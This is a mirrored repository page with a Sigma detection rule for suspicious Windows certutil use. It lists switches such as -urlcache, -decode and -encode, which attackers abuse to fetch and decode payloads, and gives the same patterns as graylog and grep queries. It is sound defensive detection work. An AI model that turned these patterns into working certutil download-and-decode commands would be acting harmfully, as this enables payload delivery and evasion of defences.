atomic-threat-coverage/win_susp_certutil_command.md at d99f01b7735a4cbda88165263043b35488ff069f

mirror of https://github.com/valitydev/atomic-threat-coverage.git synced 2024-11-06 09:35:21 +00:00

Wydra Mateusz d99f01b773 get rid of dot workaround for markdown, missing analitics added

2019-05-01 23:43:17 +02:00

5.8 KiB

Raw Blame History

Title	Suspicious Certutil Command
Description	Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code with the built-in certutil utility
ATT&CK Tactic	TA0005: Defense Evasion
ATT&CK Technique	T1140: Deobfuscate/Decode Files or Information T1105: Remote File Copy
Data Needed	DN_0002_4688_windows_process_creation_with_commandline DN_0003_1_windows_sysmon_process_creation
Trigger	T1140: Deobfuscate/Decode Files or Information T1105: Remote File Copy
Severity Level	high
False Positives	False positives depend on scripts and administrative tools used in the monitored environment
Development Status	experimental
References	https://twitter.com/JohnLaTwC/status/835149808817991680 https://twitter.com/subTee/status/888102593838362624 https://twitter.com/subTee/status/888071631528235010 https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/ https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/ https://twitter.com/egre55/status/1087685529016193025 https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Author	Florian Roth, juju4, keepwatch
Other Tags	attack.s0189 attack.s0189 attack.g0007 attack.g0007

Detection Rules

Sigma rule

title: Suspicious Certutil Command
status: experimental
description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code with
    the built-in certutil utility
author: Florian Roth, juju4, keepwatch
modified: 2019/01/22
references:
    - https://twitter.com/JohnLaTwC/status/835149808817991680
    - https://twitter.com/subTee/status/888102593838362624
    - https://twitter.com/subTee/status/888071631528235010
    - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/
    - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
    - https://twitter.com/egre55/status/1087685529016193025
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine:
            - '* -decode *'
            - '* /decode *'
            - '* -decodehex *'
            - '* /decodehex *'
            - '* -urlcache *'
            - '* /urlcache *'
            - '* -verifyctl *'
            - '* /verifyctl *'
            - '* -encode *'
            - '* /encode *'
            - '*certutil* -URL*'
            - '*certutil* /URL*'
            - '*certutil* -ping*'
            - '*certutil* /ping*'
    condition: selection
fields:
    - CommandLine
    - ParentCommandLine
tags:
    - attack.defense_evasion
    - attack.t1140
    - attack.t1105
    - attack.s0189
    - attack.g0007
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high

es-qs

xpack-watcher

graylog

CommandLine:("* \\-decode *" "* \\/decode *" "* \\-decodehex *" "* \\/decodehex *" "* \\-urlcache *" "* \\/urlcache *" "* \\-verifyctl *" "* \\/verifyctl *" "* \\-encode *" "* \\/encode *" "*certutil* \\-URL*" "*certutil* \\/URL*" "*certutil* \\-ping*" "*certutil* \\/ping*")

splunk

logpoint

grep

grep -P '^(?:.*.* -decode .*|.*.* /decode .*|.*.* -decodehex .*|.*.* /decodehex .*|.*.* -urlcache .*|.*.* /urlcache .*|.*.* -verifyctl .*|.*.* /verifyctl .*|.*.* -encode .*|.*.* /encode .*|.*.*certutil.* -URL.*|.*.*certutil.* /URL.*|.*.*certutil.* -ping.*|.*.*certutil.* /ping.*)'

5.8 KiB Raw Blame History

Detection Rules

Sigma rule

es-qs

xpack-watcher

graylog

splunk

logpoint

grep

5.8 KiB

Raw Blame History